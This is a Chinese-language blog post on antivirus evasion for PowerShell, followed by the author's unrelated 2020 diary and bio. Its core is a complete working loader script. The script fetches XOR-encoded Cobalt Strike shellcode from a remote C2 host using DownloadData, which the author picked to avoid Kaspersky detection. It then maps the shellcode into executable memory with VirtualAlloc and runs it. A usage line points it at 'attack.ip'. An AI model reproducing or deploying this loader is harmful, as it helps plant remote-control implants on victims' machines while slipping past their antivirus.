Powershell免杀(远程加载shellcode)
@ s1ye · Sunday, Mar 1, 2020 · 2 · Mar 1, 2020

远程加载

远程加载的思路很简单,只需要将bin文件放到cs服务器上,利用远程读取shellcode的方式将恶意代码加载到内存执行即可。

但是经过简单的测试我发现卡巴斯基对downloadstring方法检测的比较严格,因此考虑换一种方法。

声明: 文章内容仅供网络安全爱好者学习使用,请勿用文章中提到的技术或工具做违法的事情,否则后果自负。

通过翻阅.net的官方文档我找到了这个方法:system.net.webclient.downloaddata。

与常用的downloadstring类似,只不过该方法是直接从uri读取字节数组。这正好解决了我们的麻烦,并且使得事情变得更简单了。

# remoteshell.ps1

Set-StrictMode -Version 2

function get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}


function get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}



If ([IntPtr]::size -eq 8) {


    $client = New-Object Net.WebClient
	
	[Byte[]]$var_code = $client.
	DownloadData($args[0])
                
    for ($x = 0; $x -lt $var_code.Count; $x++) {
		$var_code[$x] = $var_code[$x] -bxor 26
	}


	$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((get_proc_address kernel32.dll VirtualAlloc), (get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
	$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
	[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

	$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (get_delegate_type @([IntPtr]) ([Void])))
	$var_runme.Invoke([IntPtr]::Zero)
}

使用方法

将bin文件放到c2上

这里的bin文件是指同样经过上篇文章中的xor后的bin文件,因为测试发现卡巴斯基会跟随请求一并访问你的c2去检测.bin文件是否存在安全隐患。

远程加载

useage: powershell .\remoteshell.ps1 http://attack.ip/enc.bin


结束语

简单的修改了cs原上线马的特征,因为cs的特征早就被加入规则库了,所以利用了最简单的方式去绕过杀软的静态查杀。

仅此记录2020,艹

2020.06.11 学校突然说不给我毕业证,经查明有一门课任课老师忘记给录成绩,与学校多次协商无果,心情烦躁,工作也不是很顺心,决定辞职。

2020.06.18 正式离职,与学校老师以及领导继续对线,恰巧赶上hw想着去赚点钱好好休息一段时间再找下一份工作。

2020.06.19 北京疫情爆发,无法进京参加hw,在大连租住地边学习边跟学校继续对线。

2020.06.24 多次与老师和领导反应,互相踢皮球,老师叫我联系领导解决,领导叫我联系老师解决,最终将学校举报到省教育厅。

2020.06.28 由于省教育厅联系学校解决此事,端午节假期结束后第一时间,学校领导及任课教师开会重新讨论该事件,最终给予我审核通过,颁发毕业证。ps: 就离谱,我自己协商不同意,举报以后就管用了? : )

2020.07.25 期间一直在家里自己搞技术玩,厂商通知去吉林hw,收拾东西准备前往。

2020.07.26 大连疫情爆发,吉林厂商不允许大连相关人员入场,需要隔离14天。

2020.07.30 经过多天预约,终于做了核酸检测,收拾装备,准备离连。

2020.08.02 连夜回到家中,父母不在家,又是无尽的孤独。甚至保安见到我大连回来的躲得远远的,并且说了句“和他一栋楼的,完了!”,????

2020.08.16 总hw次日开始,抵达杭州,17号晚班8点开始。

2020.08.17 晚八点抵达工作地点,打开电脑,收到消息9点后redteam不允许攻击,随便看看流量就写代码去了。九点十分,甲方通知护网暂停,择日开启 : ) 。

2020.08-xx 过几天马上去成都了,“巴威”来了,我希望您别影响我飞机起飞,谢谢。

以后再hw我就是个sb,要不是学校的破事心烦不想立刻工作恰巧赶上了hw,想着呆着不如多赚点,我是万万不可能参加的。hw1.5时,歇逼两个月 :)

想去哪哪疫情,离开哪哪疫情,2020,当个人吧,求你了。

关于我

s1ye的❤️博客

平时会记录一些学习笔记或分享有趣的姿势

一个热爱技术的普通网络安全从业者

团队

所在团队🌈 :ChaBug

ID:s1ye(撕夜,)

可以通过email1联系我,

- 2020 年 2 月 8 日更新


  1. [email protected] ↩︎